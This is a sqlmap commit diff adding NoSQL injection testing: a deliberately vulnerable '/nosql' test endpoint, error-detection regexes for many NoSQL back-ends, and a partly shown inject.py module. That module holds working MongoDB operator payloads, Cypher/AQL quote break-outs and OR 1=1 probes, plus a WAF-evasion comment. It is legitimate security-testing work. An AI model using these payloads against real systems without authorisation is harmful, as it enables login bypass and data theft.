Adding support for NoSQL injection
Some checks failed
/ build (macos-latest, 3.8) (push) Has been cancelled
/ build (ubuntu-latest, pypy-2.7) (push) Has been cancelled
/ build (windows-latest, 3.14) (push) Has been cancelled

This commit is contained in:
Miroslav Štampar 2026-06-24 22:57:09 +02:00
parent 0a331f2f89
commit 2893fd5c4d
11 changed files with 1535 additions and 9 deletions

View file

@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
63657c00a046ca0fb28fd069407ab6305bd7b95c42f26a96ed083fd05b152252 extra/vulnserver/vulnserver.py
43214ecb0101bce72eb243c91b90db34693ebfd485d6c111a4ae22591ff7800b extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
9387fb775b694156a71b336a2a9638ef24c577aa38746f391ac040ff05306d95 lib/controller/checks.py
96463b969312bd4fd29452b5fc739f33e5a73f81fdc1ef80ac27debbe9926e42 lib/controller/controller.py
0c6433b289094d37f295238699042a34a6ab950bb3d11f74fe9a83d30bb7f4bd lib/controller/checks.py
ea0fdf6bcda59aae4d093bada965654a0cd940227c2dbdf62b6ded79baa8dfad lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
8b260bff7f24947ece55727277d526c88a91f7cb9ffe059c4b9c190bf85f80e1 lib/core/optiondict.py
056930fba3cf9827f97d280bc38ac785c93108eb84c922f5f39723bb04dcf403 lib/core/optiondict.py
4e7f2ad3d2866093aa195616a0e93de1687406edc0b9038fbfa76bf1c9c174b2 lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
2db950a79f3f8a4bbb0f35731d4e2eef220150961be55d8ba4b1f9565bdd483a lib/core/settings.py
ca14e55b4d49a9b9f4e547180828030e4fcc51176dc9036879dbdae05919dd02 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
c1392cda2f202fa3c628f74533c8d9379d1cf7e754ac165e39021bbc2bbc4a22 lib/core/testing.py
e453904a50372216b09146ad9f11cdced2323c10f49c3d866238cc044dcb2cce lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
6060d2d11fab39796b87ace30a872302f365dea3b14d24670915fdb9edc86011 lib/parse/cmdline.py
223badcfd102cdf3313411b63d09b6c59599d58dfc40d27409b1bfa2efc1aa8f lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@ -240,6 +240,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
@ -597,6 +599,7 @@ c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_has
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
5372270b7ed82b62f273c2e9bd1f7ecd8605371e66cd0ad70663762cb08d42f1 tests/test_inference_engine.py
caa06fed7323b2bb6d0f2443ce343de94f75bf8ad012c055d5e07741d908ebad tests/test_misc.py
790b78c600b61eb0bdd6e07e14b1db3eb2ddd5fc5d4edb9e975f85ced38558c7 tests/test_nosql.py
57fa9713a3186020be8bcc3f06399e92bf9ce82ec6d3413c76babe19606bb698 tests/test_openapi_drift.py
cde0bea1263ae857561f91ed2bd515e972b716743f017d31b1718a8546c72759 tests/test_pagecontent.py
4bac34af2abddce003756d6776e89b2fda220bb7603ef3761f4f37ee29f9c369 tests/test_payload_marking.py

View file

@ -122,6 +122,46 @@ SCHEMA = """
LISTEN_ADDRESS = "localhost"
LISTEN_PORT = 8440
# Minimal MongoDB-style collection backing the NoSQL operator-injection endpoint ('/nosql'). The
# 'password' field is the blind-extraction target, constrained by a sibling 'name' equality match.
NOSQL_USERS = {
    "luther": "s3cr3t",
    "fluffy": "carrot",
    "wu": "shanghai",
}


def nosql_match(params):
    """Emulates a MongoDB find() on NOSQL_USERS: reconstructs the operator object for the 'password'
    field (from bracket-notation 'password[$ne]=...' or a JSON sub-document) and evaluates it against
    the record selected by 'name'.

    Returns True when the selected record satisfies the operator, False otherwise (including when
    'name' selects no record). An invalid or non-string $regex raises re.error (surfaced by the
    caller as a driver error)."""

    record = NOSQL_USERS.get(params.get("name"))
    spec = params.get("password")

    if isinstance(spec, dict):
        # JSON sub-document: only the first operator/value pair is honored
        op, value = next(iter(spec.items()), ("$eq", None))
    else:
        op, value = "$eq", spec

        # bracket notation ('password[$op]=v' or 'password[$op][]=v') overrides plain equality
        for key in params:
            match = re.match(r"^password\[(\$\w+)\](?:\[\])?$", key)
            if match:
                op, value = match.group(1), params[key]
                break

    # multi-valued operand: keep the last value (an empty list degrades to None)
    if isinstance(value, (tuple, list)):
        value = value[-1] if value else None

    if record is None:
        return False

    if op == "$ne":
        return record != value

    if op == "$gt":
        try:
            return record > (value or "")
        except TypeError:
            # operand of a non-comparable type (e.g. a JSON number) - treat as no match
            return False

    if op == "$regex":
        try:
            return re.search(value, record) is not None
        except TypeError:
            # missing/non-string pattern: report it through the same channel as an invalid regexp
            # instead of escaping the caller's 're.error' handler
            raise re.error("$regex has to be a string")

    # $eq, $in (single-valued here) and any literal equality
    return record == value
_conn = None
_cursor = None
_lock = None
@ -285,6 +325,20 @@ class ReqHandler(BaseHTTPRequestHandler):
self.wfile.write(form.encode(UNICODE_ENCODING))
return
if self.url == "/nosql":
self.send_response(OK)
self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
try:
output = "<html><body><b>Welcome %s</b></body></html>" % self.params.get("name") if nosql_match(self.params) else "<html><body><b>Invalid credentials</b></body></html>"
except re.error: # invalid $regex -> emulate a MongoDB driver error (drives fingerprinting)
output = "<html><body>MongoServerError: Regular expression is invalid: missing terminating ] for character class</body></html>"
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)

View file

@ -87,6 +87,7 @@ from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import MAX_STABILITY_DELAY
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
from lib.core.settings import SINGLE_QUOTE_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
@ -1170,6 +1171,13 @@ def heuristicCheckSqlInjection(place, parameter):
except (SystemError, RuntimeError) as ex:
logger.debug("Skipping FI heuristic due to regex failure: %s", getSafeExString(ex))
if not conf.nosql and re.search(NOSQL_ERROR_REGEX, page or ""):
infoMsg = "heuristic (NoSQL) test shows that %sparameter '%s' might be vulnerable to NoSQL injection attacks (rerun with switch '--nosql')" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
kb.disableHtmlDecoding = False
kb.heuristicMode = False

View file

@ -520,6 +520,11 @@ def start():
checkWaf()
if conf.nosql:
from lib.techniques.nosql.inject import nosqlScan
nosqlScan()
continue
if conf.nullConnection:
checkNullConnection()

View file

@ -118,6 +118,7 @@ optDict = {
"Techniques": {
"technique": "string",
"nosql": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.159"
VERSION = "1.10.6.160"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -466,7 +466,8 @@ ERROR_PARSING_REGEXES = (
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?P<result>query error: SELECT[^<>]+)",
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)",
r'"(?:errmsg|errorMessage|reason|msg)"\s*:\s*"(?P<result>[^"]+)"' # generic JSON error-message field (NoSQL document/REST back-ends)
)
# Regular expression used for parsing charset info from meta html headers
@ -847,6 +848,35 @@ DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
# Regular expression used for recognition of file inclusion errors
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
# Regular expressions (per back-end, anchored to actual error-message structure - not product names) used for heuristic recognition of NoSQL injection
# Each entry is a (back-end name, regular expression) pair
NOSQL_ERRORS = (
("MongoDB", r"Mongo(?:Server|Parse|Network|Runtime|Bulk|WriteConcern)?Error\b|\bBSON(?:Type)?Error\b|\bMongooseError\b|CastError: Cast to|unknown (?:top.level )?operator: ?\$|\$(?:regex|where|expr|in|nin|ne|gt|lt|elemMatch) (?:has to be|is not allowed|must be|not supported|requires)|Regular expression is invalid"),
("CouchDB", r'"error"\s*:\s*"(?:bad_request|query_parse_error|missing_named_query)"|invalid operator: ?\$'),
("Elasticsearch", r'"type"\s*:\s*"[a-z_]*?(?:query_shard|x_content_parse|parsing|search_phase_execution|illegal_argument|too_many_clauses|number_format|script)_exception"|Failed to parse query \['),
("Solr", r"org\.apache\.solr\.[\w.]*(?:SyntaxError|SolrException)"),
("Neo4j", r"Neo\.(?:ClientError|DatabaseError|TransientError|ClientNotification)\.|\bNeo4jError\b|even number of non-escaped quotes|Failed to parse string literal|expected an expression|'(?:UNWIND|OPTIONAL|DETACH|FOREACH|MERGE|LOAD CSV)'"),
("ArangoDB", r"\bArangoError\b|AQL: (?:syntax|parse) error"),
("Cassandra", r"line \d+:\d+ (?:no viable alternative at input|(?:mismatched|extraneous) input '.*?' expecting)|org\.apache\.cassandra|com\.datastax|\bInvalid(?:Request|Query)Exception\b"),
("Redis", r"\bWRONGTYPE\b|ERR Error (?:compiling|running) script|@user_script|\bReplyError\b"),
("Memcached", r"CLIENT_ERROR bad|SERVER_ERROR object too large"),
("InfluxDB", r"error parsing query|unable to parse '[^']*': found"),
("HBase/Phoenix", r"org\.apache\.phoenix|PhoenixParserException|org\.apache\.hadoop\.hbase"),
)
# Single alternation of every per-back-end pattern above (the back-end names are dropped), for a one-pass "is this any NoSQL error" search
NOSQL_ERROR_REGEX = "(?:%s)" % '|'.join(regex for _, regex in NOSQL_ERRORS)
# Printable-ASCII codepoint bounds bisected (via regexp character-class ranges) during NoSQL blind extraction
NOSQL_CHAR_MIN = 0x20
NOSQL_CHAR_MAX = 0x7e
# Maximum number of document fields enumerated during a NoSQL ($where server-side JavaScript) document dump
NOSQL_MAX_FIELDS = 64
# Maximum number of records walked during a NoSQL blind multi-record (ordered key paging) collection dump
NOSQL_MAX_RECORDS = 100
# Upper bound for the length search during NoSQL blind extraction
NOSQL_MAX_LENGTH = 1024
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6

View file

@ -88,6 +88,7 @@ def vulnTest():
("-u <url> --flush-session --technique=B --keyset --dump -T users", ("using keyset (seek) pagination", "30 entries", "luther", "nameisnull")), # keyset/seek dump via the SQLite rowid cursor
("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")),
("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
("-u \"<base>nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"<direct>\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),

View file

@ -415,6 +415,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
techniques.add_argument("--nosql", dest="nosql", action="store_true",
help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)

View file

@ -0,0 +1,6 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""

View file

@ -0,0 +1,765 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import difflib
import json
import re
import time
from collections import namedtuple
from collections import OrderedDict
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.settings import NOSQL_CHAR_MAX
from lib.core.settings import NOSQL_CHAR_MIN
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import NOSQL_MAX_FIELDS
from lib.core.settings import NOSQL_MAX_LENGTH
from lib.core.settings import NOSQL_MAX_RECORDS
from lib.core.settings import UPPER_RATIO_BOUND
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
from thirdparty.six.moves import urllib as _urllib
# Improbable literal used to build always-true/never-match payloads. Randomized per run (like
# kb.chars boundaries) so it never becomes a static signature a WAF can pin a blocking rule on.
NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
# Maximum number of characters of in-band (reflected) data surfaced from an always-true response
NOSQL_DUMP_LIMIT = 4096
# Delivery shapes that can carry an injection into a back-end filter/query
NOSQL_PLACES = (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST, PLACE.COOKIE)
# Lucene regexp metacharacters (Elasticsearch/Solr) requiring escaping in built patterns
LUCENE_META = set('.?+*|(){}[]"\\/')
# Java regexp metacharacters (Cypher/AQL =~) requiring escaping in built patterns
JAVA_META = set('.?+*|(){}[]^$\\/')
# Engines detectable through a syntax-breaking probe but lacking a clean substring oracle for blind
# extraction (mapped from recognizable error-message fragments - not product names - to back-end name)
# Each entry is (back-end name, tuple of lowercase fragments); fragments are matched against a
# lowercased response page
ERROR_SIGNATURES = (
("Cassandra", ("no viable alternative at input", "org.apache.cassandra", "com.datastax", "invalidrequestexception")),
("Redis", ("wrongtype operation", "err error compiling script", "err error running script", "@user_script", "replyerror")),
("Memcached", ("client_error bad", "server_error object too large")),
("InfluxDB", ("error parsing query", "unable to parse")),
("HBase/Phoenix", ("org.apache.phoenix", "phoenixparserexception", "org.apache.hadoop.hbase")),
)
# Unique "argument not supplied" marker (compared by identity), so that None remains a usable JSON value
_UNSET = object()
# HTTP status of the most recent request issued by _send() (None when bypassed, e.g. under tests)
_lastCode = None
# Resolved injection vector. `template` is the always-true page for content-based blind extraction
# (None for time-based/detection-only); `bypass` is the always-true payload reported as a login/filter
# bypass; `truth` overrides the content oracle (e.g. a timing predicate for the $where time-based path);
# `dump` is a callable returning (columns, rows) for a whole-document dump (server-side-JS key enumeration).
Vector = namedtuple("Vector", ("dbms", "fetch", "lengthValue", "charValue", "template", "bypass", "truth", "dump"))
# The four defaults bind to the trailing four fields (template, bypass, truth, dump); the first four stay mandatory
Vector.__new__.__defaults__ = (None, None, None, None)
def _ratio(first, second):
    """Quick (upper-bound) difflib similarity of two pages; a None/empty page counts as an empty string"""
    matcher = difflib.SequenceMatcher(None, first or "", second or "")
    return matcher.quick_ratio()
def _encode(value):
    """Percent-encodes `value` with no character class left unescaped as 'safe' (so '/' is encoded too)"""
    encoded = _urllib.parse.quote(value, safe="")
    return encoded
def _lucene(value):
    """Backslash-escapes every character of `value` that is listed in LUCENE_META"""
    escaped = []
    for char in value:
        if char in LUCENE_META:
            escaped.append("\\")
        escaped.append(char)
    return "".join(escaped)
def _javaEscape(value):
    """Backslash-escapes every character of `value` that is listed in JAVA_META"""
    pieces = [("\\" + char) if char in JAVA_META else char for char in value]
    return "".join(pieces)
def _quoted(regex):
    """Doubles every backslash of `regex`"""
    # a regexp placed inside a single-quoted string literal (Cypher/AQL/N1QL) loses one level of
    # backslashes to the literal's own processing before the engine parses it - pre-compensate here
    return "\\\\".join(regex.split("\\"))
def _isJsonBody():
    """True when the request body was hinted (kb.postHint) as JSON or JSON-like"""
    jsonHints = (POST_HINT.JSON, POST_HINT.JSON_LIKE)
    return kb.postHint in jsonHints
def _jsonKey(parameter):
    """Strips a leading 'JSON ' or 'JSON-like ' marker from a parameter name, returning the bare key"""
    if parameter.startswith("JSON "):
        return parameter[len("JSON "):]
    if parameter.startswith("JSON-like "):
        return parameter[len("JSON-like "):]
    return parameter
def _delim(place):
    """Parameter delimiter for the place: conf.cookieDel (';' when unset) for cookies, '&' otherwise"""
    if place == PLACE.COOKIE:
        return conf.cookieDel or ';'
    return '&'
def _originalValue(place, parameter):
    """Returns the raw value of `parameter` as it appears in conf.parameters[place] (first matching
    segment wins), falling back to conf.paramDict and finally to an empty string"""
    pairs = (segment.partition('=') for segment in conf.parameters[place].split(_delim(place)))
    for name, _, value in pairs:
        if name.strip() == parameter:
            return value

    fallback = conf.paramDict.get(place, {}).get(parameter)
    return fallback or ""
def _replaceSegment(place, parameter, segment):
    """Returns conf.parameters[place] with the first occurrence of the target parameter swapped for
    `segment` (e.g. 'k[$ne]=v' or 'k=v'), every sibling parameter kept verbatim. When the raw string
    holds no such parameter, the result is rebuilt (percent-encoded) from conf.paramDict[place]"""
    delimiter = _delim(place)
    parts = conf.parameters[place].split(delimiter)

    for index, part in enumerate(parts):
        if part.split('=', 1)[0].strip() == parameter:
            return delimiter.join(parts[:index] + [segment] + parts[index + 1:])

    # target not present in the raw string: regenerate all pairs from the parsed dictionary
    rebuilt = []
    for name, value in conf.paramDict[place].items():
        if name == parameter:
            rebuilt.append(segment)
        else:
            rebuilt.append("%s=%s" % (_encode(name), _encode(value)))

    return delimiter.join(rebuilt)
def _send(place, parameter, segment=None, jsonValue=_UNSET):
    """Issues a single request with the target parameter overridden - by raw 'name=value' segment for
    URL/body parameters, or by setting the key to `jsonValue` for JSON bodies - returning the response
    page ('' when there is none). The response's HTTP status is stored in the module-level _lastCode"""
    global _lastCode

    # a request that raises must not leave the previous response's status behind
    _lastCode = None

    # payloads are already percent-encoded by the callers; keep the request layer from re-encoding
    skipUrlEncode = conf.skipUrlEncode
    conf.skipUrlEncode = True

    try:
        kwargs = {"raise404": False, "silent": True}

        if jsonValue is not _UNSET and _isJsonBody() and place in (PLACE.POST, PLACE.CUSTOM_POST):
            try:
                data = json.loads(conf.data)
            except Exception:
                data = {}

            # a valid JSON body whose top level is not an object (array/scalar) cannot take a key
            if not isinstance(data, dict):
                data = {}

            data[_jsonKey(parameter)] = jsonValue
            payload = kwargs["post"] = json.dumps(data)
        elif place == PLACE.COOKIE:
            payload = kwargs["cookie"] = _replaceSegment(place, parameter, segment)
        else:
            payload = _replaceSegment(place, parameter, segment)
            kwargs["post" if place in (PLACE.POST, PLACE.CUSTOM_POST) else "get"] = payload

        logger.log(CUSTOM_LOGGING.PAYLOAD, _urllib.parse.unquote(payload))  # readable, surfaced at -v 3 like a regular sqlmap payload
        page, _, _lastCode = Request.getPage(**kwargs)
    finally:
        conf.skipUrlEncode = skipUrlEncode

    return page or ""
def _isError(page):
    """True when the latest response carried a 5xx status or `page` matches NOSQL_ERROR_REGEX"""
    # such a response is NOT a valid always-true template (prevents two differing error pages
    # from faking a boolean oracle)
    if (_lastCode or 0) >= 500:
        return True
    return re.search(NOSQL_ERROR_REGEX, page or "") is not None
def _fetch(place, parameter, op, value, isArray=False):
    """MongoDB/CouchDB dialect: sends the parameter as an operator object - 'name[op]=value' (or
    'name[op][]=value' when `isArray`) in bracket shape, {op: value} (or {op: [value]}) in JSON shape"""
    if isArray:
        suffix, document = "[%s][]" % op, {op: [value]}
    else:
        suffix, document = "[%s]" % op, {op: value}

    segment = "%s%s=%s" % (_encode(parameter), suffix, _encode(value))
    return _send(place, parameter, segment, document)
def _fetchValue(place, parameter, value):
    """String dialects (Lucene query_string, Cypher, AQL): sends the parameter with its value replaced
    by `value` (percent-encoded in the raw segment, verbatim in a JSON body)"""
    segment = "%s=%s" % (_encode(parameter), _encode(value))
    return _send(place, parameter, segment, value)
def _boolean(truthy, falsy):
    """Returns the true-page when a true/false payload pair yields a stable content divergence (the
    true-page reproduces itself and differs from the false-page) - i.e. the payload reached and
    influenced the back-end - else None. `truthy`/`falsy` are zero-argument request callables"""
    reference = truthy()

    # an empty or error response is never a valid always-true template
    if reference and not _isError(reference):
        negative = falsy()
        reproducible = _ratio(reference, truthy()) > UPPER_RATIO_BOUND
        if reproducible and _ratio(reference, negative) < UPPER_RATIO_BOUND:
            return reference

    return None
def _detectMongo(place, parameter):
    """Operator-injection probe: returns the always-true page on success, otherwise a falsy value"""
    # never-match side shared by both attempts: $in [sentinel]
    matchNone = lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True)

    # $ne sentinel (matches everything)
    template = _boolean(lambda: _fetch(place, parameter, "$ne", NOSQL_SENTINEL), matchNone)
    if template:
        return template

    # fallback always-true for apps that filter $ne but not the comparison operators:
    # $gt '' (matches any string)
    return _boolean(lambda: _fetch(place, parameter, "$gt", ""), matchNone)
def _detectES(place, parameter):
    """query_string probe: '*' (matches everything) vs a literal sentinel (matches nothing)"""
    def matchAll():
        return _fetchValue(place, parameter, '*')

    def matchNone():
        return _fetchValue(place, parameter, NOSQL_SENTINEL)

    return _boolean(matchAll, matchNone)
def _detectCypher(place, parameter):
    """Single-quote break-out probe: OR '1'='1' (true) vs OR '1'='2' (false)"""
    def sendTrue():
        return _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='1")

    def sendFalse():
        return _fetchValue(place, parameter, NOSQL_SENTINEL + "' OR '1'='2")

    return _boolean(sendTrue, sendFalse)
def _detectAQL(place, parameter):
    """Single-quote break-out probe: || '1'=='1 (true) vs || '1'=='2 (false)"""
    def sendTrue():
        return _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='1")

    def sendFalse():
        return _fetchValue(place, parameter, NOSQL_SENTINEL + "' || '1'=='2")

    return _boolean(sendTrue, sendFalse)
def _detectNumeric(place, parameter):
    """Unquoted (numeric-context) boolean break-out for SQL-like back-ends: OR/AND (Cypher/N1QL) or
    ||/&& (AQL). Returns (dbms, always-true page, always-true payload), or None when the original
    value is not all digits or no divergence is observed"""
    # a numeric field is not blindly regexp-extractable, so exploitation is the in-band dump of the
    # always-true response (rows reflected by the page)
    value = (_originalValue(place, parameter) or "1").strip()
    if not value.isdigit():
        return None

    template = _boolean(lambda: _fetchValue(place, parameter, "%s OR 1=1" % value), lambda: _fetchValue(place, parameter, "%s AND 1=2" % value))
    if template:
        # Cypher, N1QL and PartiQL share OR/AND; tell them apart by a constant-arg, field-free primitive
        # each engine alone honors: N1QL REGEXP_CONTAINS, DynamoDB begins_with (Cypher has neither)
        fingerprints = (
            ("Couchbase", "%s OR REGEXP_CONTAINS('ab', 'a') OR 1=2", "%s OR REGEXP_CONTAINS('ab', 'z') OR 1=2"),
            ("DynamoDB", "%s OR begins_with('ab', 'a') OR 1=2", "%s OR begins_with('ab', 'z') OR 1=2"),
        )

        dbms = "Neo4j"
        for candidate, trueFormat, falseFormat in fingerprints:
            if _confirm(place, parameter, trueFormat % value, falseFormat % value):
                dbms = candidate
                break

        return dbms, template, "%s OR 1=1" % value

    template = _boolean(lambda: _fetchValue(place, parameter, "%s || 1==1" % value), lambda: _fetchValue(place, parameter, "%s && 1==2" % value))
    if template:
        return "ArangoDB", template, "%s || 1==1" % value

    return None
def _detectError(place, parameter):
    """Last-resort probe: appends a single quote to the original value and, when the response diverges
    from the normal one, returns the first ERROR_SIGNATURES engine whose fragment appears in it"""
    baseValue = _originalValue(place, parameter) or '1'
    normalPage = _fetchValue(place, parameter, baseValue)
    brokenPage = _fetchValue(place, parameter, baseValue + "'")

    diverged = bool(normalPage) and _ratio(normalPage, brokenPage) < UPPER_RATIO_BOUND
    if diverged:
        lowered = brokenPage.lower()
        for engine, tokens in ERROR_SIGNATURES:
            for token in tokens:
                if token in lowered:
                    return engine

    return None
def _fingerprintMongo(place, parameter):
    """Tells CouchDB from MongoDB by the wording of the error provoked with an invalid $regex ('(');
    'MongoDB (assumed)' when the response carries no recognizable wording"""
    page = _fetch(place, parameter, "$regex", '(').lower()  # invalid regexp -> driver/DB error

    signatures = (
        ("CouchDB", ("couch", "mango", "bad_arg", "erlang")),
        ("MongoDB", ("mongo", "bson", "regular expression", "$regex")),
    )

    for dbms, tokens in signatures:
        for token in tokens:
            if token in page:
                return dbms

    return "MongoDB (assumed)"
